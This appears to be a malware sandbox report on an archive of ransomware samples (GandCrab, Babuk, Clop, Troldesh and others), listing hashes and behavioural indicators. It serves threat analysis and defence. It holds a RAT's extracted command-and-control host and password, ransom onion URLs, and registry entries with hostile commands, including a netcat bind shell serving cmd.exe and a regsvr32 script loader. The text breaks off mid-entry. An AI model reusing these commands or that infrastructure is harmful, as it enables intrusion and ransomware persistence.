Analysis
-
max time kernel
217s -
max time network
309s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
27-10-2024 16:00
Static task
static1
Behavioral task
behavioral1
Sample
RNSM00424.7z
Resource
win10v2004-20241007-en
General
-
Target
RNSM00424.7z
-
Size
49.1MB
-
MD5
336f8ae05e74a7e35bad8814d1c68b9c
-
SHA1
582c5d7c2fb98d8dd2035a25971f2b45ecfb269a
-
SHA256
9b85a4cc99fb037c9f4033d54fc9f857cc5a89a3da48b3deaf0697c02873b8f5
-
SHA512
b5e7591c8a005c3e80e4b1a3157ebb707be3dfca023bb9b063d395fa7536345616fae2868ce837420c71fdf44145a03627c18f24b4a9ad40959cd6b6e8a7a202
-
SSDEEP
786432:YGuBiJAIDNGSOYHmWR1ZcbH4cflRHRju4boIidRxVIm3TcxcAJncrA1sai7XzKZW:YGdJAr/WR1ZasxHxumDcGSc03mXWZXxw
Malware Config
Extracted
cybergate
v1.07.5
User
frankrat.no-ip.org:1604
3J717VQ3Q355I6
-
enable_keylogger
true
-
enable_message_box
false
-
ftp_directory
./logs/
-
ftp_interval
30
-
injected_process
explorer.exe
-
install_flag
false
-
keylogger_enable_ftp
false
-
message_box_caption
Remote Administration anywhere in the world.
-
message_box_title
CyberGate
-
password
frank123
Extracted
F:\$RECYCLE.BIN\S-1-5-21-4089630652-1596403869-279772308-1000\DKHMRCDXTJ-MANUAL.txt
gandcrab
http://gandcrabmfe6mnef.onion/11584738b93043c2
Extracted
C:\Recovery\WindowsRE\How To Restore Your Files.txt
http://gtmx56k4hutn3ikv.onion/blog/ff6b763849c49971c7ef8508064a3d8681529c7f45e532ff9e3d9ec13165263b/
http://gtmx56k4hutn3ikv.onion/
http://babukq4e2p4wu4iq.onion/login.php?id=l6Kr29xLbfnq1f0jzES55LLmmrZPd8
Extracted
C:\HOW-TO-DECRYPT-jjj9b.txt
http://o76s3m7l5ogig4u5.onion
Signatures
-
Babuk Locker
RaaS first seen in 2021 initially called Vasa Locker.
-
Babuk family
-
Clop family
-
Cybergate family
-
Gandcrab
Gandcrab is a Trojan horse that encrypts files on a computer.
-
Gandcrab family
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\Desktop\\00424\\Trojan-Ransom.Win32.Gimemo.cdqu-92c167bd5ce56b5e2798056e3f3129b43f019ba3370ac5a88894126b94cae16d.exe" Trojan-Ransom.Win32.Gimemo.cdqu-92c167bd5ce56b5e2798056e3f3129b43f019ba3370ac5a88894126b94cae16d.exe -
Modifies firewall policy service 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe -
Modiloader family
-
Neshta
Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.
-
Neshta family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 3 IoCs
resource yara_rule behavioral1/memory/5656-3553-0x0000000000D90000-0x00000000011B0000-memory.dmp family_stormkitty behavioral1/memory/5656-3562-0x0000000000D90000-0x00000000011B0000-memory.dmp family_stormkitty behavioral1/memory/5656-4408-0x0000000000D90000-0x00000000011B0000-memory.dmp family_stormkitty -
Stormkitty family
-
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
description pid Process procid_target PID 3064 created 1080 3064 taskmgr.exe 157 PID 3064 created 1080 3064 taskmgr.exe 157 -
Troldesh family
-
Troldesh, Shade, Encoder.858
Troldesh is a ransomware spread by malspam.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe -
clop
Ransomware discovered in early 2019 which has been actively developed since release.
-
resource yara_rule behavioral1/files/0x0007000000023c98-323.dat cryptone -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ UDS-Trojan-Ransom.Win32.PornoAsset.gen-bd78f4c233a67d83272ea92de4c5afff1a73dfea2abbb4489e54f0f5cfb6d9ac.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ UDS-Trojan-Ransom.Win32.Zerber.gen-c44b300c0e95a6782b39bda041a3ddf1a03190e99c9785384657f3dd332e42eb.exe -
ModiLoader Second Stage 2 IoCs
resource yara_rule behavioral1/memory/2516-196-0x0000000000400000-0x0000000000C2A000-memory.dmp modiloader_stage2 behavioral1/memory/1448-246-0x0000000000400000-0x0000000000C2A000-memory.dmp modiloader_stage2 -
Renames multiple (195) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Renames multiple (370) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 8584 Powershell.exe -
Disables RegEdit via registry modification 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe -
Disables Task Manager via registry modification
-
Drops file in Drivers directory 2 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe File created C:\Windows\SysWOW64\drivers\gmreadme.txt Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 3300 netsh.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion UDS-Trojan-Ransom.Win32.Zerber.gen-c44b300c0e95a6782b39bda041a3ddf1a03190e99c9785384657f3dd332e42eb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion UDS-Trojan-Ransom.Win32.Zerber.gen-c44b300c0e95a6782b39bda041a3ddf1a03190e99c9785384657f3dd332e42eb.exe -
Checks computer location settings 2 TTPs 12 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.Blocker.jklq-af2d6cbb88ec14080026c0c0ee24a28c4c90e8ea5979440ef85f4f007a730e7a.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.Blocker.mvrm-4138c885d1abbe86b0a700b1ff8489932b25c3fb3feaed4bb60f269d80ef22d4.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.Foreign.olpr-302fecaf77de168224abccd8a610dda5699e0d16ea5fa4577de83fad2f22433a.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.MSIL.njLime.gen-17fdc8576a2bfc5aaca1ca1094c3e3f46a304074d7d1bfe68776a33b460e9e57.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.Blocker.lyiu-985b67a88f7fc9935704c7c18ecb4a7d077fb02c658a9d3fcfec9439776564d5.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation hack.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation key7.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe -
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\DKHMRCDXTJ-MANUAL.txt Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\b930442fb93043ce713.lock Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\DKHMRCDXTJ-MANUAL.txt Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe -
Executes dropped EXE 60 IoCs
pid Process 1712 HEUR-Trojan-Ransom.MSIL.Blocker.gen-388a6625b398cbfbd4d915b8165b37ebba259fe9ef89a6bbef5ca9677b42ed52.exe 2184 HEUR-Trojan-Ransom.MSIL.Gen.gen-886ed9d1806668c086ece3c4d433b9daced419d2fc8645d3c5db28a7b7878cd0.exe 2156 HEUR-Trojan-Ransom.MSIL.Makop.gen-0ed05e4be5376f0cf391a78afc7a3114ffbfa064348fb66cd93e8ee6f6b27fe1.exe 1088 HEUR-Trojan-Ransom.MSIL.njLime.gen-17fdc8576a2bfc5aaca1ca1094c3e3f46a304074d7d1bfe68776a33b460e9e57.exe 1484 HEUR-Trojan-Ransom.MSIL.Petr.gen-164a86e099913008bebcd659331c1033c4afd97af2a15cca3a35765bca504be9.exe 1080 HEUR-Trojan-Ransom.MSIL.Thanos.gen-68cfd9eeb25aebc7a65c5c72b8426edc88865ec13732374ba5dda877107bfe6a.exe 2520 HEUR-Trojan-Ransom.Win32.KlopRansom.gen-ed3dfa9f2452537d378ead320e1506d392d3f91557d8c52714dfd6024176cf73.exe 3428 Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe 440 Trojan-Ransom.Win32.Blocker.jklq-af2d6cbb88ec14080026c0c0ee24a28c4c90e8ea5979440ef85f4f007a730e7a.exe 1064 Trojan-Ransom.Win32.Blocker.lvzt-9bc75c69ead3c8ae7297911c3603cecc3f3d3c739cd5ebb60b111af1939c6952.exe 4972 Trojan-Ransom.Win32.Blocker.jklq-af2d6cbb88ec14080026c0c0ee24a28c4c90e8ea5979440ef85f4f007a730e7a.exe 3200 ncarchive.rar.exe 2516 Trojan-Ransom.Win32.Blocker.lyiu-985b67a88f7fc9935704c7c18ecb4a7d077fb02c658a9d3fcfec9439776564d5.exe 4444 Trojan-Ransom.Win32.Blocker.mvrm-4138c885d1abbe86b0a700b1ff8489932b25c3fb3feaed4bb60f269d80ef22d4.exe 1448 AdobeART.exe 3200 hack.exe 2852 Trojan-Ransom.Win32.Crusis.dqg-79b8c026d2e90a16b4a585f38be231828bc9d52255948d4a7d9248bb25e882d1.exe 4068 Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe 4020 Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe 1136 Trojan-Ransom.Win32.DoppelPaymer.bf-9d2ef7b5f84ee093e0e010add38917032d45008533472c6744c16c072f266f48.exe 3920 Trojan-Ransom.Win32.Foreign.oftl-85a577c129c5ee7b40f871113fe6f7886d12bfa6d82f6b343cb0ec5d077dccf6.exe 2860 Trojan-Ransom.Win32.Foreign.ogrt-265f042465660e355ac24f236997230a0c0adc35cb240844a6fd6650d457da3b.exe 216 Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe 2296 Trojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exe 1080 Trojan-Ransom.Win32.Gimemo.cdqu-92c167bd5ce56b5e2798056e3f3129b43f019ba3370ac5a88894126b94cae16d.exe 1764 Trojan-Ransom.Win32.Hades.c-08a62815eabccc8dbc7babe0dfabcae9cb37a20f66373ca0bb7254c7e6c6f1bb.exe 372 Trojan-Ransom.Win32.Locky.adiq-a11caa15d682952f356c75249b803496c532ec358094b97e7daee6a17a4210e8.exe 2128 Trojan-Ransom.Win32.PornoBlocker.ejtx-724dc1a3bd703a339b5b71136baad19a35f97d1b7c6e94d7fefd4f324dcb5bf3.exe 4344 Trojan-Ransom.Win32.Shade.psr-4d2b8abe7b2d79eb3cd44171a73a645d2d2370d64e51734208b7ef261b8e21ce.exe 2432 Trojan-Ransom.Win32.Foreign.olpr-302fecaf77de168224abccd8a610dda5699e0d16ea5fa4577de83fad2f22433a.exe 100 Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe 5728 ditziw.exe 6044 AVShieldPro.exe 5544 Trojan-Ransom.Win32.Shade.pvw-04c4e2ad0699cc27f79c0b4f62a12ce8514aea55e5737628de293d81846cf7c5.exe 1900 key7.exe 6348 key6.exe 7120 key6.exe 6104 UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe 6376 Trojan-Ransom.Win32.Foreign.oftl-85a577c129c5ee7b40f871113fe6f7886d12bfa6d82f6b343cb0ec5d077dccf6.exe 5536 rundll32.exe 6620 ditziw.exe 8248 UDS-Trojan-Ransom.Win32.PornoAsset.gen-bd78f4c233a67d83272ea92de4c5afff1a73dfea2abbb4489e54f0f5cfb6d9ac.exe 9180 Trojan-Ransom.Win32.Foreign.ogrt-265f042465660e355ac24f236997230a0c0adc35cb240844a6fd6650d457da3b.exe 6232 UDS-Trojan-Ransom.Win32.Zerber.gen-c44b300c0e95a6782b39bda041a3ddf1a03190e99c9785384657f3dd332e42eb.exe 4740 nc.exe 5068 Studio 2976 nc.exe 6848 ditziw.exe 5656 VHO-Trojan-Ransom.Win32.Blocker.gen-296a2e629991f1fa388bda5e674dd6471e8f84787137fb17a7567d143ea24376.exe 6764 VHO-Trojan-Ransom.Win32.Convagent.gen-ceb44492510d44d5bc712a41e1f4da9f5e222647b7a0f9a55db5c8cfcf024f59.exe 7780 ditziw.exe 7820 HEUR-Trojan-Ransom.MSIL.njLime.gen-17fdc8576a2bfc5aaca1ca1094c3e3f46a304074d7d1bfe68776a33b460e9e57.exe 5732 HEUR-Trojan-Ransom.MSIL.njLime.gen-17fdc8576a2bfc5aaca1ca1094c3e3f46a304074d7d1bfe68776a33b460e9e57.exe 5644 ditziw.exe 5832 ditziw.exe 6804 ditziw.exe 8384 ditziw.exe 7840 ditziw.exe 1968 ditziw.exe 8508 ditziw.exe -
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine UDS-Trojan-Ransom.Win32.PornoAsset.gen-bd78f4c233a67d83272ea92de4c5afff1a73dfea2abbb4489e54f0f5cfb6d9ac.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine UDS-Trojan-Ransom.Win32.Zerber.gen-c44b300c0e95a6782b39bda041a3ddf1a03190e99c9785384657f3dd332e42eb.exe -
Loads dropped DLL 29 IoCs
pid Process 100 Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe 100 Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe 100 Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe 100 Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe 100 Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe 100 Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe 100 Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe 100 Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe 100 Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe 100 Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe 100 Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe 100 Trojan-Ransom.Win32.Crypmodadv.xso-dfa08f135298af057fe9c99cae3377fdea1d01992ab385b6d1362cac37cb37fb.exe 5728 ditziw.exe 7120 key6.exe 7120 key6.exe 7120 key6.exe 7120 key6.exe 7120 key6.exe 7120 key6.exe 7120 key6.exe 6620 ditziw.exe 6848 ditziw.exe 7780 ditziw.exe 5644 ditziw.exe 5832 ditziw.exe 6804 ditziw.exe 8384 ditziw.exe 7840 ditziw.exe 1968 ditziw.exe -
Modifies system executable filetype association 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" HEUR-Trojan-Ransom.MSIL.njLime.gen-17fdc8576a2bfc5aaca1ca1094c3e3f46a304074d7d1bfe68776a33b460e9e57.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Uses the VBS compiler for execution 1 TTPs
-
resource yara_rule behavioral1/files/0x0007000000023c8c-183.dat vmprotect behavioral1/memory/2516-196-0x0000000000400000-0x0000000000C2A000-memory.dmp vmprotect behavioral1/memory/1448-246-0x0000000000400000-0x0000000000C2A000-memory.dmp vmprotect -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 VHO-Trojan-Ransom.Win32.Blocker.gen-296a2e629991f1fa388bda5e674dd6471e8f84787137fb17a7567d143ea24376.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 VHO-Trojan-Ransom.Win32.Blocker.gen-296a2e629991f1fa388bda5e674dd6471e8f84787137fb17a7567d143ea24376.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 VHO-Trojan-Ransom.Win32.Blocker.gen-296a2e629991f1fa388bda5e674dd6471e8f84787137fb17a7567d143ea24376.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 12 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cb41b96ff7da38575275b04b70b35012 = "regsvr32.exe /s /n /u /i:\"C:\\Users\\Admin\\AppData\\Roaming\\PO18PC84T2C.txt\" scrobj.dll." Trojan-Ransom.Win32.Foreign.ogrt-265f042465660e355ac24f236997230a0c0adc35cb240844a6fd6650d457da3b.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\NC = "C:\\Users\\Admin\\AppData\\Local\\nc.exe -L -p 53 -e cmd.exe" Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svechosts = "C:\\Users\\Admin\\AppData\\Roaming\\svechosts.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\AdobeART = "C:\\Users\\Admin\\AppData\\Roaming\\AdobeART.exe" AdobeART.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Registry Service = "C:\\Windows\\system32\\cmd.exe /c \"C:\\Users\\Admin\\AppData\\Local\\fuwswiqh.exe\"" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Trojan-Ransom = "C:\\Users\\Admin\\Desktop\\00424\\Trojan-Ransom.Win32.Foreign.oftl-85a577c129c5ee7b40f871113fe6f7886d12bfa6d82f6b343cb0ec5d077dccf6.exe" Trojan-Ransom.Win32.Foreign.oftl-85a577c129c5ee7b40f871113fe6f7886d12bfa6d82f6b343cb0ec5d077dccf6.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Updater = "C:\\Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe" Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Registry Service = "C:\\Windows\\system32\\cmd.exe /c \"C:\\Users\\Admin\\AppData\\Local\\fuwswiqh.exe\"" Trojan-Ransom.Win32.Blocker.jklq-af2d6cbb88ec14080026c0c0ee24a28c4c90e8ea5979440ef85f4f007a730e7a.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVShieldPro = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\AVShieldPro.exe" Trojan-Ransom.Win32.Foreign.olpr-302fecaf77de168224abccd8a610dda5699e0d16ea5fa4577de83fad2f22433a.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\userini = "C:\\Users\\Admin\\Desktop\\00424\\Trojan-Ransom.Win32.Gimemo.cdqu-92c167bd5ce56b5e2798056e3f3129b43f019ba3370ac5a88894126b94cae16d.exe" Trojan-Ransom.Win32.Gimemo.cdqu-92c167bd5ce56b5e2798056e3f3129b43f019ba3370ac5a88894126b94cae16d.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Client Server Runtime Subsystem = "\"C:\\ProgramData\\Windows\\csrss.exe\"" Trojan-Ransom.Win32.Shade.pvw-04c4e2ad0699cc27f79c0b4f62a12ce8514aea55e5737628de293d81846cf7c5.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Updater = "C:\\Users\\Admin\\Desktop\\00424\\Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe" Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Trojan-Ransom.Win32.Blocker.hgll-d9c7eea5b9b35d2bad184345fba2a717d75dcaab688a691066182530ffaf9c9f.exe -
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\B: Trojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exe File opened (read-only) \??\B: Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe File opened (read-only) \??\H: Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe File opened (read-only) \??\I: Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe File opened (read-only) \??\G: UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe File opened (read-only) \??\I: Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe File opened (read-only) \??\P: Trojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exe File opened (read-only) \??\S: Trojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exe File opened (read-only) \??\R: Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe File opened (read-only) \??\U: Trojan-Ransom.Win32.Crypmod.accd-7a6ac2d2173048ec95dc9bbc5d07a5465f823cfc6118718c98bcb1b1fcb7df1b.exe File opened (read-only) \??\P: UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe File opened (read-only) \??\A: Trojan-Ransom.Win32.GandCrypt.iym-0a4980f402f1ad859dd8499d9ee196cc61947b2f9a2207d3a81bcec7636c158a.exe File opened (read-only) \??\X: Trojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exe File opened (read-only) \??\S: UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe File opened (read-only) \??\H: UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe File opened (read-only) \??\E: Trojan-Ransom.Win32.Gen.nuu-6f43ca24b77d4c7a1732d7a182f122fde61ec5316382c36eb0bc53baa97f6a79.exe File opened (read-only) \??\K: 